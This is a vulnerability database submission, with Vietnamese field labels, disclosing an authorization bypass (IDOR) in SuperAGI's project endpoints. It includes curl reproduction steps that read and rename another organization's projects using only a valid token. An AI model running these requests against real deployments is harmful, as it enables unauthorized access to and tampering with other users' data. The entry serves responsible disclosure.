| tiêu đề | SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639) |
|---|
| Mô tả | # Technical Details
An Insecure Direct Object Reference (IDOR) exists in the `get_project`, `update_project`, and `get_projects_organisation` methods in `superagi/controllers/project.py` of SuperAGI.
The application fails to verify that the target project or organization belongs to the requesting user. All three endpoints only validate the JWT token via `Depends(check_auth)` but perform no organization membership verification.
# Vulnerable Code
File: superagi/controllers/project.py
Method: get_project (lines 70-89), update_project (lines 92-124), get_projects_organisation (lines 127-151)
Why: All endpoints use attacker-controlled `project_id` or `organisation_id` URL parameters without any ownership check, allowing cross-organization data access and modification.
# Reproduction
1. Authenticate with an attacker account and obtain a valid JWT.
2. List all projects for victim's organization:
curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/organisation/3"
3. Read a specific victim project:
curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/1"
4. Modify victim's project name:
curl -s -X PUT -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" "http://localhost:3000/api/projects/update/1" -d '{"name":"HACKED Project","description":"compromised"}'
# Impact
- Information Disclosure: Attacker enumerates all projects and their configurations across all organizations.
- Data Integrity: Project names and descriptions can be modified, disrupting team workflows.
- Reconnaissance: Project listing reveals organizational structure and agent deployment patterns.
|
|---|
| Nguồn | ⚠️ https://gist.github.com/YLChen-007/ac40da2253c7364d043c0dfe3275190b |
|---|
| Người dùng | Eric-z (UID 95890) |
|---|
| Đệ trình | 27/03/2026 13:01 (cách đây 24 ngày) |
|---|
| Kiểm duyệt | 19/04/2026 18:13 (23 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 358249 [TransformerOptimus SuperAGI đến 0.0.14 project.py nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|